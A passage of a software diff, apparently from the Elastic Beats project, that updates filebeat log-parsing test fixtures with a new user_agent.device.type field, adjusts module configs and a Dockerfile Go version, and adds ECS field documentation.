"related.user": [ "ntore" @@ -5571,8 +5644,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "ereprehe", "rsa.misc.action": [ - "Blocked", - "tutl" + "tutl", + "Blocked" ], "rsa.misc.category": "mip", "rsa.misc.filter": "umSecti", @@ -5598,6 +5671,7 @@ "url.original": "https://example.com/sedqui/iuntNe.gif?epteu=nvent#uepor", "user.name": "ntore", "user_agent.device.name": "U307AS", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -5647,8 +5721,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "diconseq", "rsa.misc.action": [ - "Allowed", - "umet" + "umet", + "Allowed" ], "rsa.misc.category": "ciad", "rsa.misc.filter": "oeiusmod", @@ -5674,6 +5748,7 @@ "url.original": "https://www5.example.net/lits/Nemoen.txt?elillu=seruntmo#imidest", "user.name": "squir", "user_agent.device.name": "G8142", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -5708,8 +5783,8 @@ "ngelitse7535.internal.lan" ], "related.ip": [ - "10.209.203.156", - "10.110.16.169" + "10.110.16.169", + "10.209.203.156" ], "related.user": [ "mes" @@ -5750,6 +5825,7 @@ "url.original": "https://example.org/eius/evo.jpg?iarchit=volupt#ipis", "user.name": "mes", "user_agent.device.name": "G8142", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -5784,8 +5860,8 @@ "tiumtot3611.internal.localdomain" ], "related.ip": [ - "10.107.68.114", - "10.84.9.150" + "10.84.9.150", + "10.107.68.114" ], "related.user": [ "sequatDu" @@ -5799,8 +5875,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "omnis", "rsa.misc.action": [ - "Allowed", - "uianonnu" + "uianonnu", + "Allowed" ], "rsa.misc.category": "Excepteu", "rsa.misc.filter": "enimadmi", @@ -5826,6 +5902,7 @@ "url.original": "https://www5.example.net/equun/veli.gif?tem=iadeseru#uiineavo", "user.name": "sequatDu", "user_agent.device.name": "LG-$2", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; LG-US998) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -5860,8 +5937,8 @@ "gnaa4656.api.example" ], "related.ip": [ - "10.26.222.144", - "10.124.119.48" + "10.124.119.48", + "10.26.222.144" ], "related.user": [ "nre" @@ -5902,6 +5979,7 @@ "url.original": "https://internal.example.com/ecatcu/tMalo.txt?nse=rauto#rese", "user.name": "nre", "user_agent.device.name": "Samsung SM-A305FN", + "user_agent.device.type": "Phone", "user_agent.name": "YandexSearch", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; SM-A305FN Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.96 Mobile Safari/537.36 YandexSearch/8.10 YandexSearchBrowser/8.10", "user_agent.os.full": "Android 10", @@ -5936,8 +6014,8 @@ "psaqu6066.www5.localhost" ], "related.ip": [ - "10.164.190.2", - "10.223.11.164" + "10.223.11.164", + "10.164.190.2" ], "related.user": [ "ten" @@ -5951,8 +6029,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "officiad", "rsa.misc.action": [ - "Allowed", - "antium" + "antium", + "Allowed" ], "rsa.misc.category": "emoeni", "rsa.misc.filter": "itvo", @@ -5978,6 +6056,7 @@ "url.original": "https://mail.example.org/ntutlabo/leumiure.htm?eacommo=amqua#tionevol", "user.name": "ten", "user_agent.device.name": "LM-V350", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; LM-V350) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 10", @@ -6027,8 +6106,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "vitaedic", "rsa.misc.action": [ - "rinc", - "Blocked" + "Blocked", + "rinc" ], "rsa.misc.category": "prehende", "rsa.misc.filter": "rume", @@ -6054,6 +6133,7 @@ "url.original": "https://www.example.org/ugitsed/ritatis.jpg?xplic=stenat#mquis", "user.name": "umwr", "user_agent.device.name": "Lenovo A2016a40 ", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; Lenovo A2016a40 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.106 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30", "user_agent.os.full": "Android 6.0", @@ -6088,8 +6168,8 @@ "uame1361.api.local" ], "related.ip": [ - "10.10.93.133", - "10.90.20.202" + "10.90.20.202", + "10.10.93.133" ], "related.user": [ "evita" @@ -6103,8 +6183,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "tat", "rsa.misc.action": [ - "nia", - "Blocked" + "Blocked", + "nia" ], "rsa.misc.category": "turQuis", "rsa.misc.filter": "nonp", @@ -6130,6 +6210,7 @@ "url.original": "https://mail.example.com/aute/dictasu.gif?ptas=iadolo#cidu", "user.name": "evita", "user_agent.device.name": "ZTE Blade V1000RU", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; ZTE Blade V1000RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91", "user_agent.os.full": "Android 9", @@ -6179,8 +6260,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "Exce", "rsa.misc.action": [ - "Allowed", - "ulapa" + "ulapa", + "Allowed" ], "rsa.misc.category": "reprehen", "rsa.misc.filter": "itsedqui", @@ -6206,6 +6287,7 @@ "url.original": "https://mail.example.net/enbyCic/aturau.gif?orroqui=sci#psamvolu", "user.name": "tectobe", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Yandex Browser", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 YaBrowser/20.3.0.2221 Yowser/2.5 Safari/537.36", "user_agent.os.full": "Mac OS X 10.15.6", @@ -6282,6 +6364,7 @@ "url.original": "https://example.org/olu/mqua.txt?mdolore=ita#aeratvol", "user.name": "isnos", "user_agent.device.name": "VS996", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.0.0; VS996) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 8.0.0", @@ -6316,8 +6399,8 @@ "tat6671.www.local" ], "related.ip": [ - "10.236.55.236", - "10.149.6.107" + "10.149.6.107", + "10.236.55.236" ], "related.user": [ "redolo" @@ -6331,8 +6414,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "uis", "rsa.misc.action": [ - "mvele", - "Allowed" + "Allowed", + "mvele" ], "rsa.misc.category": "vitaedi", "rsa.misc.filter": "ndeomni", @@ -6358,6 +6441,7 @@ "url.original": "https://api.example.net/mnisiut/eabil.jpg?psumqui=trude#ccusa", "user.name": "redolo", "user_agent.device.name": "LM-V350", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; LM-V350) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 10", @@ -6434,6 +6518,7 @@ "url.original": "https://api.example.net/uamestq/eetdol.html?ctionofd=uianonnu#ntNeque", "user.name": "colab", "user_agent.device.name": "Micromax P410i", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36", "user_agent.os.full": "Android 4.1.2", @@ -6483,8 +6568,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "itautf", "rsa.misc.action": [ - "Blocked", - "mini" + "mini", + "Blocked" ], "rsa.misc.category": "gna", "rsa.misc.filter": "usmo", @@ -6510,6 +6595,7 @@ "url.original": "https://mail.example.net/ius/msequ.jpg?ptat=tionula#gnido", "user.name": "umdolo", "user_agent.device.name": "ZTE BLADE V7", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; ZTE BLADE V7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 6.0", @@ -6559,8 +6645,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "issuscip", "rsa.misc.action": [ - "remap", - "Blocked" + "Blocked", + "remap" ], "rsa.misc.category": "eetdolo", "rsa.misc.filter": "rsitam", @@ -6586,6 +6672,7 @@ "url.original": "https://www.example.org/iat/acom.html?umdolo=oluptass#umqu", "user.name": "mnisiuta", "user_agent.device.name": "LM-V350", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; LM-V350) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 10", @@ -6662,6 +6749,7 @@ "url.original": "https://www.example.com/onorum/umiure.gif?lites=admini#trumexer", "user.name": "aeabillo", "user_agent.device.name": "Notepad_K10", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Safari/537.36", "user_agent.os.full": "Android 9", @@ -6711,8 +6799,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "ilmoles", "rsa.misc.action": [ - "Blocked", - "tatisetq" + "tatisetq", + "Blocked" ], "rsa.misc.category": "ametco", "rsa.misc.filter": "liquide", @@ -6738,6 +6826,7 @@ "url.original": "https://mail.example.org/veni/rspi.htm?ntium=imadmi#dquiac", "user.name": "tNequ", "user_agent.device.name": "Pixel 3", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; Pixel 3 Build/PD1A.180720.030) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -6814,6 +6903,7 @@ "url.original": "https://www.example.com/tem/litsedq.htm?ium=utfugit#beat", "user.name": "uptat", "user_agent.device.name": "Spider", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) yahoo.adquality.lwd.desktop/1591143192-10" }, @@ -6844,8 +6934,8 @@ "icero1297.internal.domain" ], "related.ip": [ - "10.138.193.38", - "10.46.71.46" + "10.46.71.46", + "10.138.193.38" ], "related.user": [ "sintocca" @@ -6886,6 +6976,7 @@ "url.original": "https://www.example.com/amcola/eumiurer.gif?stiaeco=equu#laborisn", "user.name": "sintocca", "user_agent.device.name": "Spider", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) yahoo.adquality.lwd.desktop/1591143192-10" }, @@ -6916,8 +7007,8 @@ "oloremeu5047.www5.invalid" ], "related.ip": [ - "10.254.119.31", - "10.172.159.251" + "10.172.159.251", + "10.254.119.31" ], "related.user": [ "usm" @@ -6931,8 +7022,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "imadmi", "rsa.misc.action": [ - "tatemacc", - "Blocked" + "Blocked", + "tatemacc" ], "rsa.misc.category": "tutlabor", "rsa.misc.filter": "eturad", @@ -6958,6 +7049,7 @@ "url.original": "https://api.example.net/sedquian/lamcorpo.html?sequatD=Nequepo#veleum", "user.name": "usm", "user_agent.device.name": "U20", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; U20 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.147 Mobile Safari/537.36 YaApp_Android/10.90 YaSearchBrowser/10.90", "user_agent.os.full": "Android 6.0", @@ -7007,8 +7099,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "isnost", "rsa.misc.action": [ - "oriosa", - "Allowed" + "Allowed", + "oriosa" ], "rsa.misc.category": "uis", "rsa.misc.filter": "nemul", @@ -7034,6 +7126,7 @@ "url.original": "https://www5.example.com/ictasun/iumto.txt?erro=admin#uisnostr", "user.name": "ptassit", "user_agent.device.name": "Samsung SM-A715F", + "user_agent.device.type": "Phone", "user_agent.name": "Facebook", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; SM-A715F Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/83.0.4103.83 Mobile Safari/537.36 [FB_IAB/Orca-Android;FBAV/266.0.0.16.117;]", "user_agent.os.full": "Android 10", @@ -7110,6 +7203,7 @@ "url.original": "https://www5.example.org/oriosa/ssusc.htm?atemacc=rsitvolu#isi", "user.name": "eroi", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Yandex Browser", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 YaBrowser/20.3.0.2221 Yowser/2.5 Safari/537.36", "user_agent.os.full": "Mac OS X 10.15.6", @@ -7144,8 +7238,8 @@ "nos4114.api.lan" ], "related.ip": [ - "10.31.58.6", - "10.198.84.190" + "10.198.84.190", + "10.31.58.6" ], "related.user": [ "unt" @@ -7186,6 +7280,7 @@ "url.original": "https://mail.example.net/tseddoei/byCi.gif?assitas=nul#ame", "user.name": "unt", "user_agent.device.name": "Android", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 5.1.1; Android Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/9.80 YaSearchBrowser/9.80", "user_agent.os.full": "Android 5.1.1", @@ -7235,8 +7330,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "rrorsi", "rsa.misc.action": [ - "exe", - "Allowed" + "Allowed", + "exe" ], "rsa.misc.category": "mnihi", "rsa.misc.filter": "consequa", @@ -7262,6 +7357,7 @@ "url.original": "https://www5.example.org/liquipe/rehe.gif?niamqu=uioffi#suntin", "user.name": "hende", "user_agent.device.name": "Samsung GT-P3100 ", + "user_agent.device.type": "Tablet", "user_agent.name": "Android", "user_agent.original": "Mozilla/5.0 (Linux; U; Android 4.0.3; es-us; GT-P3100 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30", "user_agent.os.full": "Android 4.0.3", @@ -7296,8 +7392,8 @@ "ueip6097.api.host" ], "related.ip": [ - "10.128.43.71", - "10.152.217.174" + "10.152.217.174", + "10.128.43.71" ], "related.user": [ "mquiado" @@ -7338,6 +7434,7 @@ "url.original": "https://www.example.org/erit/asiarch.gif?tdolor=oremagna#siuta", "user.name": "mquiado", "user_agent.device.name": "Notepad_K10", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Safari/537.36", "user_agent.os.full": "Android 9", @@ -7372,8 +7469,8 @@ "fugiatqu7793.www.localdomain" ], "related.ip": [ - "10.26.149.221", - "10.217.193.148" + "10.217.193.148", + "10.26.149.221" ], "related.user": [ "uisa" @@ -7387,8 +7484,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "tionemu", "rsa.misc.action": [ - "Blocked", - "rehe" + "rehe", + "Blocked" ], "rsa.misc.category": "aecons", "rsa.misc.filter": "aturve", @@ -7414,6 +7511,7 @@ "url.original": "https://mail.example.org/maven/tectob.jpg?litsedd=mnis#ainci", "user.name": "uisa", "user_agent.device.name": "QMobile X700 PRO II", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; QMobile X700 PRO II) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36", "user_agent.os.full": "Android 6.0", @@ -7448,8 +7546,8 @@ "onsequ3168.www.corp" ], "related.ip": [ - "10.172.17.6", - "10.109.192.53" + "10.109.192.53", + "10.172.17.6" ], "related.user": [ "eprehen" @@ -7490,6 +7588,7 @@ "url.original": "https://www.example.com/siarch/oloremi.htm?one=iduntutl#tNe", "user.name": "eprehen", "user_agent.device.name": "U20", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; U20 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.147 Mobile Safari/537.36 YaApp_Android/10.90 YaSearchBrowser/10.90", "user_agent.os.full": "Android 6.0", @@ -7539,8 +7638,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "exeacomm", "rsa.misc.action": [ - "volup", - "Blocked" + "Blocked", + "volup" ], "rsa.misc.category": "ten", "rsa.misc.filter": "ssecil", @@ -7566,6 +7665,7 @@ "url.original": "https://mail.example.com/ostr/liqu.txt?niam=mullamc#umtota", "user.name": "ore", "user_agent.device.name": "5024D_RU", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61", "user_agent.os.full": "Android 9", diff --git a/x-pack/filebeat/module/zscaler/zia/test/test.log-expected.json b/x-pack/filebeat/module/zscaler/zia/test/test.log-expected.json index d2e89ea6140..f651e843b07 100644 --- a/x-pack/filebeat/module/zscaler/zia/test/test.log-expected.json +++ b/x-pack/filebeat/module/zscaler/zia/test/test.log-expected.json @@ -31,8 +31,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "", "rsa.misc.action": [ - "", - "" + "", + "" ], "rsa.misc.category": "", "rsa.misc.filter": "", @@ -54,6 +54,7 @@ "url.original": "", "user.name": "", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "" } diff --git a/x-pack/filebeat/modules.d/microsoft.yml.disabled b/x-pack/filebeat/modules.d/microsoft.yml.disabled index 63bcc20897a..43944caad29 100644 --- a/x-pack/filebeat/modules.d/microsoft.yml.disabled +++ b/x-pack/filebeat/modules.d/microsoft.yml.disabled @@ -28,7 +28,11 @@ #var.oauth2.client.secret: "" # Oauth Token URL, should include the tenant ID - #var.oauth2.token_url: "https://login.microsoftonline.com/TENANT-ID/oauth2/token" + #var.oauth2.token_url: "https://login.microsoftonline.com/TENANT-ID/oauth2/v2.0/token" + + # Related scopes, default should be included + #var.oauth2.scopes: + # - "https://api.security.microsoft.com/.default" dhcp: enabled: true diff --git a/x-pack/filebeat/modules.d/zeek.yml.disabled b/x-pack/filebeat/modules.d/zeek.yml.disabled index feacbf939d6..d1349bf1388 100644 --- a/x-pack/filebeat/modules.d/zeek.yml.disabled +++ b/x-pack/filebeat/modules.d/zeek.yml.disabled @@ -34,6 +34,8 @@ enabled: true notice: enabled: true + ntp: + enabled: true ntlm: enabled: true ocsp: diff --git a/x-pack/functionbeat/Dockerfile b/x-pack/functionbeat/Dockerfile index 3aa5e4bf820..7f043ffad55 100644 --- a/x-pack/functionbeat/Dockerfile +++ b/x-pack/functionbeat/Dockerfile @@ -1,4 +1,4 @@ -FROM golang:1.15.9 +FROM golang:1.15.10 RUN \ apt-get update \ diff --git a/x-pack/functionbeat/docs/fields.asciidoc b/x-pack/functionbeat/docs/fields.asciidoc index 5cc8da65133..59232d4e114 100644 --- a/x-pack/functionbeat/docs/fields.asciidoc +++ b/x-pack/functionbeat/docs/fields.asciidoc @@ -88,6 +88,15 @@ type: keyword -- +*`user_agent.device.type`*:: ++ +-- +Type of device where the user agent is running. + +type: keyword + +-- + [[exported-fields-cloud]] == Cloud provider metadata fields @@ -473,6 +482,17 @@ example: Montreal -- +*`client.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`client.geo.continent_name`*:: + -- @@ -530,6 +550,18 @@ example: boston-dc -- +*`client.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`client.geo.region_iso_code`*:: + -- @@ -552,6 +584,17 @@ example: Quebec -- +*`client.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`client.ip`*:: + -- @@ -565,9 +608,12 @@ type: ip + -- MAC address of the client. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`client.nat.ip`*:: @@ -882,6 +928,18 @@ example: us-east-1 -- +*`cloud.service.name`*:: ++ +-- +The cloud service name is intended to distinguish services running on different platforms within a provider, eg AWS EC2 vs Lambda, GCP GCE vs App Engine, Azure VM vs App Server. +Examples: app engine, app service, cloud run, fargate, lambda. + +type: keyword + +example: lambda + +-- + [float] === code_signature @@ -899,6 +957,18 @@ example: true -- +*`code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`code_signature.status`*:: + -- @@ -922,6 +992,18 @@ example: Microsoft Corporation -- +*`code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`code_signature.trusted`*:: + -- @@ -1088,6 +1170,17 @@ example: Montreal -- +*`destination.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`destination.geo.continent_name`*:: + -- @@ -1145,6 +1238,18 @@ example: boston-dc -- +*`destination.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`destination.geo.region_iso_code`*:: + -- @@ -1167,6 +1272,17 @@ example: Quebec -- +*`destination.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`destination.ip`*:: + -- @@ -1180,9 +1296,12 @@ type: ip + -- MAC address of the destination. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`destination.nat.ip`*:: @@ -1401,6 +1520,18 @@ example: true -- +*`dll.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`dll.code_signature.status`*:: + -- @@ -1424,6 +1555,18 @@ example: Microsoft Corporation -- +*`dll.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`dll.code_signature.trusted`*:: + -- @@ -1484,6 +1627,15 @@ type: keyword -- +*`dll.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`dll.name`*:: + -- @@ -2229,6 +2381,18 @@ example: true -- +*`file.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`file.code_signature.status`*:: + -- @@ -2252,6 +2416,18 @@ example: Microsoft Corporation -- +*`file.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`file.code_signature.trusted`*:: + -- @@ -2400,6 +2576,15 @@ type: keyword -- +*`file.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`file.inode`*:: + -- @@ -2890,6 +3075,17 @@ example: Montreal -- +*`geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`geo.continent_name`*:: + -- @@ -2947,6 +3143,18 @@ example: boston-dc -- +*`geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`geo.region_iso_code`*:: + -- @@ -2969,6 +3177,17 @@ example: Quebec -- +*`geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + [float] === group @@ -3006,8 +3225,9 @@ type: keyword [float] === hash -The hash fields represent different hash algorithms and their values. +The hash fields represent different bitwise hash algorithms and their values. Field names for common hashes (e.g. MD5, SHA1) are predefined. Add fields for other hashes by lowercasing the hash algorithm name and using underscore separators as appropriate (snake case, e.g. sha3_512). +Note that this fieldset is used for common hashes that may be computed over a range of generic bytes. Entity-specific hashes such as ja3 or imphash are placed in the fieldsets to which they relate (tls and pe, respectively). *`hash.md5`*:: @@ -3046,6 +3266,15 @@ type: keyword -- +*`hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + [float] === host @@ -3064,6 +3293,35 @@ example: x86_64 -- +*`host.cpu.usage`*:: ++ +-- +Percent CPU used which is normalized by the number of CPU cores and it ranges from 0 to 1. +Scaling factor: 1000. +For example: For a two core host, this value should be the average of the two cores, between 0 and 1. + +type: scaled_float + +-- + +*`host.disk.read.bytes`*:: ++ +-- +The total number of bytes (gauge) read successfully (aggregated from all disks) since the last metric collection. + +type: long + +-- + +*`host.disk.write.bytes`*:: ++ +-- +The total number of bytes (gauge) written successfully (aggregated from all disks) since the last metric collection. + +type: long + +-- + *`host.domain`*:: + -- @@ -3087,6 +3345,17 @@ example: Montreal -- +*`host.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`host.geo.continent_name`*:: + -- @@ -3144,6 +3413,18 @@ example: boston-dc -- +*`host.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`host.geo.region_iso_code`*:: + -- @@ -3166,6 +3447,17 @@ example: Quebec -- +*`host.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`host.hostname`*:: + -- @@ -3199,10 +3491,13 @@ type: ip *`host.mac`*:: + -- -Host mac addresses. +Host MAC addresses. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: ["00-00-5E-00-53-23", "00-00-5E-00-53-24"] + -- *`host.name`*:: @@ -3215,6 +3510,42 @@ type: keyword -- +*`host.network.egress.bytes`*:: ++ +-- +The number of bytes (gauge) sent out on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.egress.packets`*:: ++ +-- +The number of packets (gauge) sent out on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.ingress.bytes`*:: ++ +-- +The number of bytes received (gauge) on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.ingress.packets`*:: ++ +-- +The number of packets (gauge) received on all network interfaces by the host since the last metric collection. + +type: long + +-- + *`host.os.family`*:: + -- @@ -3492,6 +3823,18 @@ format: bytes -- +*`http.request.id`*:: ++ +-- +A unique identifier for each HTTP request to correlate logs between clients and servers in transactions. +The id may be contained in a non-standard HTTP header, such as `X-Request-ID` or `X-Correlation-ID`. + +type: keyword + +example: 123e4567-e89b-12d3-a456-426614174000 + +-- + *`http.request.method`*:: + -- @@ 